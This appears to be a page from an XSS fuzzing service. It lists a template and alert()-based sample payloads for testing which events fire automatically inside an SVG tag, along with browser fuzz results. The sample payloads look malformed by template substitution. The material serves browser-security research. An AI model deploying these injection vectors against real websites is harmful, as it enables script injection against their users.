XSS vectors that execute automatically inside svg

This vector shows which events fire without user interaction inside a SVG tag

Created by: hackvertor

Created on: Wednesday, April 17, 2024 at 6:20:49 PM

Updated on: Tuesday, December 3, 2024 at 12:30:12 PM

Vector type: XSS

Vector charset: UTF-8

Template used:

<svg><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>
<svg><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>

Your browser was detected as:

Detecting... Detecting... Detecting... Detecting...

Sample payloads

<svg><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></svg>
<svg><img->onerror ="alert('img->onerror->')"></img->onerror></svg>

Fuzz results

Safari 17.4.1 Unknown Unknown

Updated

Wed Apr 17 2024

Found 1 result

Show differences only?

Filter out alphanumeric

Sort ascending

Chrome 124.0.0.0 Unknown Unknown

Updated

Thu Apr 18 2024

Found 1 result

Show differences only?

Filter out alphanumeric

Sort ascending